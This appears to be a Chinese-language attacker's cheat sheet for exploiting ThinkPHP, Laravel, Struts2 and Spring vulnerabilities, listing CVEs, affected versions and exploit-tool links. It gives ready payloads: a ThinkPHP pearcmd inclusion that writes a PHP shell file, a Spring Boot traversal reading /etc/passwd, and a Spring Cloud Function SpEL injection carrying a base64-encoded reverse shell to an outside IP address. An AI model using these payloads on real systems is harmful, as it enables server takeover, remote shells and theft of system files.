PHP-ThinkPHP Laravel
ThinkPHP 是一套开源的、基于 PHP 的轻量级 Web 应用开发框架
综合工具:武器库-ThinkPHP 专检(3-6 版本)
-
版本 6.X 文件包含
在其 6.0.13 版本及以前
/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php -
版本 5.X 命令执行
其 5.0.23 以前的版本,5.0.22/5.1.29 等
Laravel 是一套简洁、优雅的 PHP Web 开发框架(PHP Web Framework)。
- CVE-2021-3129 RCELaravel ⇐ 8.4.2https://github.com/zhzyker/CVE-2021-3129https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
Java-Struct2 Spring
Apache Struts2 是一个流行的开发 Web 应用框架,用于开发 JavaEE 应用
https://github.com/abc123info/Struts2VulsScanTools
-
Spring-Core-RCE(CVE-2022-22965)
存在于 Spring 框架以及衍生的框架中,并 JDK 9.0 及以上版本会受到影响
-
Spring Boot 目录遍历(CVE-2021-21234) vulfocus
Spring-boot-actuator-logview 0.2.13 之前版本存在路径遍历漏洞,攻击者可通过该缺陷读取系统任意文件。
参考:blog.csdn.net/weixin_43165012/article/details/121152482
/manage/log/view?filename=etc/passwd&base=../../../../../../ -
Spring Cloud Function SpEL 表达式注入 CVE-2022-22963 vulhub
Spring Cloud Function 提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像 Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。
3.0.0.RELEASE ⇐ Spring Cloud Function ⇐ 3.2.2
参考:https://developer.aliyun.com/article/1160011
POST /functionRouter spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}") -
Spring Cloud Gateway 命令执行 (CVE-2022-22947)
参考:https://cloud.tencent.com/developer/article/2164533
Spring Cloud Gateway 是 Spring 中的一个 API 网关。
Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
其他旧的、不受支持的 Spring Cloud Gateway 版本
监控配置不当利用:
见前面 Actuator-heapdump 利用讲解
综合 CVE 利用工具:
https://github.com/0x727/SpringBootExploit
https://github.com/13exp/SpringBoot-Scan-GUI